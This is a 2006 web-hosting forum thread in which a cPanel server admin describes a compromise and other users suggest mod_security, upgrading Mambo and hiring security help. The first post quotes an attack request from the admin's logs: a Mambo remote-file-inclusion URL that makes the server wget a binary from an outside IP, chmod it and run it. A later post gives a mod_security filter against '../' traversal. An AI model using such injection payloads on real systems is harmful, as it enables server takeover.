The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HACKED again?!?!

Discussion in 'General Discussion' started by pcsousa, Mar 24, 2006.

  1. pcsousa

    pcsousa Well-Known Member

    Joined:
    May 28, 2004
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    Hi all.

    Last december my server was hacked: a massive deface using the /tmp executable bug. After that we replace server with a new EV1 HD and cPanel image. We checked /tmp and they are all as a partition on /etc/fstab with something like "/dev/hda3 /tmp ext3 defaults,noexec 1 0".

    Today, when I'm running top apllication (I usually run it while I'm working) I saw a ./pt process using lot of resources and running as nobody, I think was nobody. I get in panic and I kill it imediatly. I made a serach over forums.cpanel.net and found that ./pt is maybe an haking attempt. I got some strange IPs from Russia and Turkey (allways the same) at http logs and baned them from my machine. Finaly I made a ls /etc and voila! a ./bc and psybnc files and directory... bc has run permitions. I removed those files but I have a question.... How can they run apllications in /tmp if it is noexec? How do I know what was affected? How can they download applications to my server? Using mambo, oscommerce or phpbb (I usually patch phpbb)?

    I can't sleep till I know how can they get in and how can I protect my server!

    I found lots of
    PHP:
    /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
    which seems somebody are using mambo bug to open URLs on other server where they are hacking...

    What can I do to avoid mass defaces?
    Kind regards!
     
  2. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Do a forum search on mod_security, it's exactly what you need. Besides upgrading mambo ofcourse :)
     
  3. pcsousa

    pcsousa Well-Known Member

    Joined:
    May 28, 2004
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    I think mambo is uptodate... the "h" version I think. Maybe other users. I'm gonna install mod_security.

    ty.
     
  4. cLub2Share

    cLub2Share Well-Known Member

    Joined:
    Oct 4, 2003
    Messages:
    114
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    united Arab Emirates
    cPanel Access Level:
    Website Owner
    Twitter:
    it seem to me like they use Shallaccount.. do u have the safe mod Enable ? :rolleyes:
     
  5. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Although Mod Security is great, it is not a substitute for strong OS and application security. Security is not a "set it and forget it" proposition. Because there are no absolutes, constant monitoring is essential. New attacks are being developed every day and if you're simply going to respond once an attack is discovered it's likely too late. Hackers will use any means to disguise other, more intrusive, exploits. In many cases simply waiting for obvious evidence that you've been hacked means you'll never know you've been hacked. In short, you need to ensure maximum security possible on your server.
     
  6. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,474
    Likes Received:
    202
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Mambo was moved to Joomla a few months ago and has had several updates since that point. So if you're running Mambo I think you should upgrade it again.


    You'll do yourself good to hire a pro to help with securing your server as well.

    I recommend: http://www.configserver.com/
     
  7. capoti

    capoti Active Member

    Joined:
    Mar 25, 2006
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    yip, mambo is no use no more. do yourself a favor and hire a server management company to secure your server. i highly recommend http://servertune.com
     
    #7 capoti, Mar 25, 2006
    Last edited by a moderator: Mar 26, 2006
  8. pcsousa

    pcsousa Well-Known Member

    Joined:
    May 28, 2004
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    thank you all for suggestions.

    It seems they are using the /admin/file_manager.php from osCommerce application to read files inside the server (like /etc/passwd to know how many users you have, and /home path's; check http://www.opennet.ru/base/cgi/1084898281_16.txt.html) and also to get files inside the server using wget. This /admin/ is a demo store, so there was no password protections. I've already removed it. Also I had the following text to mod_security:
    PHP:
    # WEB-PHP osCommerce bug
    SecFilter "filename=\.\./"
    (osCommerce by itself will not use "../", more: do not forget to leave a white line at the end of Mod_Security configuration over cPanel, otherwise cPanel will send an error at the end of the edit page next time)


    Mambo is still developed, right? Joombla is a new comunity atarted because Mambo royalties "stupid" idea. More, I saw those mambo references in httpd logs but all of them returns 404 (not found) error. It seems a kind of bug search since for each sequence there are lot of URL testes (post and get), but all 404.
     
Loading...

Share This Page